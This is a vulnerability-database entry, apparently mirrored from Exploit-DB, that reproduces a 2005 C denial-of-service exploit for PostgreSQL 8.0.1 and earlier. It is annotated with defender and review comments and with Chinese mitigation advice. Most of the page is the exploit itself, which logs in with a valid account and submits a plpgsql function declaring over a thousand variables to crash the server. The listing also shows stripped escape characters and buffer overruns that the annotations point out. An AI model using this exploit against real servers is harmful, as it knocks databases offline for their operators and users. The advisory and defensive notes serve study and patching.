PostgreSQL 8.01 – Remote Reboot (Denial of Service)


漏洞ID 1055018 漏洞类型
发布时间 2005-04-19 更新时间 2005-04-19
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/946
|漏洞详情
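漏洞细节尚未披露。根据下方 PoC 的头部注释和用法说明,触发条件是:目标服务器已启用 plpgsql 语言,且请求方持有可登录的数据库账号(需要用户名和密码);PoC 标注的受影响版本为 PostgreSQL 8.0.1 及更早版本。防护上应升级到已修复的版本,并仅向可信角色授予 plpgsql 语言的 USAGE 权限。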
|漏洞EXP
/* PostgreSQL Remote Reboot <=8.01 
 * writen by ChoiX [[email protected]]
 * (c) Unl0ck Research Team [www.unl0ck.org]
 *	info: Server can be rebooted only if plpgsql language is switched on.
 *		To compilate exploit you should have "libpq" library on your box 
 *		and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include  -L/usr/local/pgsql/lib -lpq
 *		Root exploits will be released later, coz now it's very dangerous to release it.
 *	greets to: 
 *			unl0ck members: DarkEagle, crash-x, nekd0, xtix, [0xdeadbabe]
 *			m00 members: ov3r 
 */
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>

/* Connection defaults used by main() when -P / -d are not supplied. */
#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
/* Identifiers embedded in the generated statement. They are fixed strings, so
 * they double as search terms for server statement logs during triage. */
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table" 

/* Destination for the statement assembled by make_str(). It is a fixed
 * 4000-byte global that make_str() fills with strcpy/strcat, neither of which
 * checks the remaining space. */
char str[4000];
/* Format templates for the pieces of a PL/pgSQL function definition: header,
 * DECLARE section with numbered varchar variables, and a SELECT INTO whose
 * WHERE clause references those variables.
 * NOTE(review): sequences such as "$$n", "DECLAREn" and "trec" look like
 * newline/tab escapes whose backslash was lost when this page was extracted;
 * treat the listing as a description of the statement's shape, not as a
 * faithful copy of the original source. */
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$n";
char declare[] = "DECLAREn";
/* com[] is defined but not referenced by any code in this listing. */
char com[] = "t--%n";
char varible_REC[] = "trec RECORD;n";
char varible_var[] = "tvar%d varchar := 'BBBB';n";
char begin[] = "BEGINn";
char select_1[] = "SELECT INTO rec FROM %s WHEREn";
char select_2[] = "var%d = AAAA ANDn";
char select_3[] = "var1029 = AAAA;n";
char end[] = "ENDn";
char finish[] = "$$ LANGUAGE plpgsqln";


/*
 * Print the banner and the command-line synopsis, then terminate the process.
 *
 * name: program name shown in the synopsis (main() passes argv[0]).
 *
 * Does not return: it ends with exit(0), so an argument error is reported to
 * the calling shell as success.
 * NOTE(review): exit() is declared in <stdlib.h>, which this file's include
 * list does not name.
 */
void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1n");
printf("writen by ChoiX [[email protected]]n");
printf("(c) Unl0ck Research Team [[email protected]]n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] n", name);
printf("Default port = %snDefault dbname = %sn", DEFAULT_PORT, DEFAULT_DB);
exit(0);
}

/* Forward declaration; make_str() is defined after main(). */
int make_str();

/*
 * Entry point: parse the connection options, log in to the database through
 * libpq, submit the statement built by make_str(), and report whether the
 * connection is still usable afterwards.
 *
 * Options: -H host, -u user and -p password are required; -P port and
 * -d database fall back to DEFAULT_PORT / DEFAULT_DB.
 *
 * Defender notes: the statement is only sent after PQsetdbLogin() succeeds,
 * so the condition this program tests for needs a valid database account on
 * the target. Account hygiene and limiting which roles may define functions
 * therefore reduce exposure in addition to upgrading the server.
 *
 * Exit status: 1 when the initial connection fails, 0 on every other path.
 */
int main(int argc, char *argv[]){
// NOTE(review): getopt() returns int; holding it in a char makes the
// comparison with EOF below depend on the platform's char signedness.
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
// 'he' is declared but never used in this function.
struct hostent *he;
PGconn *conn;
PGresult *res;

while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
	switch(opt){
		case 'H':
			host = optarg;
			break;
		case 'P':
			port = optarg;
			break;
		case 'u':
			user = optarg;
			break;
		case 'p':
			password = optarg;
			break;
		case 'd':
			dbname = optarg;
			break;
		default:
			// usage() exits, so the break below is never reached.
			usage(argv[0]);
			break;
	}
}
// Host, user and password are mandatory; port and database have defaults.
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT; 
if(dbname == NULL) dbname = DEFAULT_DB;

printf("tPostgreSQL Remote DoS <=8.0.1n");
printf("[*] Host/Port: %s/%sn", host, port);
// Echoes the password in cleartext to stdout, so it ends up in terminal
// scrollback and in any captured output of the run.
printf("[*] DBname/User/Password: %s/%s/%sn", dbname, user, password); 

// The two NULL arguments are libpq's pgoptions and pgtty parameters.
conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
	PQfinish(conn);
	printf("[-] Cannot connect to the databasen");
	exit(1);
}
printf("[+] Connected to the databasen");

// Return value of make_str() is ignored; it always returns 0.
make_str();
printf("[+] Command has been generatedn");
// 'res' is not checked for NULL and is never released with PQclear().
res = PQexec(conn, str);
// Informational only: there is no else branch, so any other result status
// is silently ignored.
if (PQresultStatus(res) == PGRES_TUPLES_OK){
	printf("[+] Command has been sentn");
}
// The only outcome test is the state of this client's connection. "Rebooted"
// is the author's wording; what is observed here is CONNECTION_BAD after the
// statement. NOTE(review): the server-side impact has to be confirmed from the
// server's own logs, not from this message.
if(PQstatus(conn) == CONNECTION_BAD){
	printf("[+] Server has been rebootedn");
	exit(0);
} else {
	// 'conn' is not closed with PQfinish() on either branch before exiting.
	printf("[-] Server hasnt been rebootedn");
	exit(0);
}
}

/*
 * Assemble the statement text in the global buffer 'str' from the format
 * templates defined at file scope.
 *
 * Each fragment is formatted into the 100-byte scratch buffer 'temp' (bounded
 * to 99 bytes by snprintf) and then appended to 'str' with strcpy/strcat.
 * The resulting text is a single CREATE OR REPLACE FUNCTION ... LANGUAGE
 * plpgsql statement declaring 1029 numbered varchar variables and referencing
 * 1028 of them in one WHERE clause. That shape, together with the fixed names
 * FUNC_NAME and TABLE_NAME, is what to look for in server statement logs
 * (e.g. with log_statement enabled) on servers in the affected range.
 * NOTE(review): the page does not disclose the root cause on the server side;
 * presumably the variable count is the relevant factor - confirm against the
 * vendor advisory.
 *
 * Memory safety of this listing: the appends to 'str' are unbounded. The two
 * loops alone add more than two thousand fragments of at least 17 bytes each
 * to a 4000-byte buffer, so the writes run past the end of 'str', which is
 * undefined behavior. A run of this listing therefore proves nothing about
 * whether a given server is patched.
 *
 * Returns: always 0.
 * NOTE(review): strcpy/strcat are declared in <string.h>, which this file's
 * include list does not name.
 */
int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;

// Function header: formats create[] with FUNC_NAME and starts 'str' with it.
snprintf(temp, len, create, FUNC_NAME); 
strcpy(str,temp);
// Original comment names declare[], but the template formatted here is begin[].
snprintf(temp, len, begin);
strcat(str, temp);
// Record variable declaration (varible_REC[]).
snprintf(temp, len, varible_REC);
strcat(str, temp);
// 1029 numbered varchar declarations, var0 .. var1028 (varible_var[]).
for(i = 0;i < 1029;i++){
	snprintf(temp, len, varible_var, i);
	strcat(str, temp);
}
// begin[] template.
snprintf(temp, len, begin);
strcat(str, temp);
// Start of the SELECT INTO, formatted with TABLE_NAME (select_1[]).
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
// 1028 WHERE conditions, var0 .. var1027 (select_2[]).
for(i = 0;i < 1028;i++){
	snprintf(temp, len, select_2, i);
	strcat(str, temp);
}
// Final WHERE condition (select_3[]).
snprintf(temp, len, select_3);
strcat(str, temp);
// Original comment names end[], but 'temp' is passed as both the destination
// and the format string; snprintf with overlapping objects is undefined
// behavior, and end[] is never used.
snprintf(temp, len, temp);
strcat(str, temp);
// Closing delimiter and language clause (finish[]).
snprintf(temp, len, finish);
strcat(str,temp);

return 0;
}



// milw0rm.com [2005-04-19]
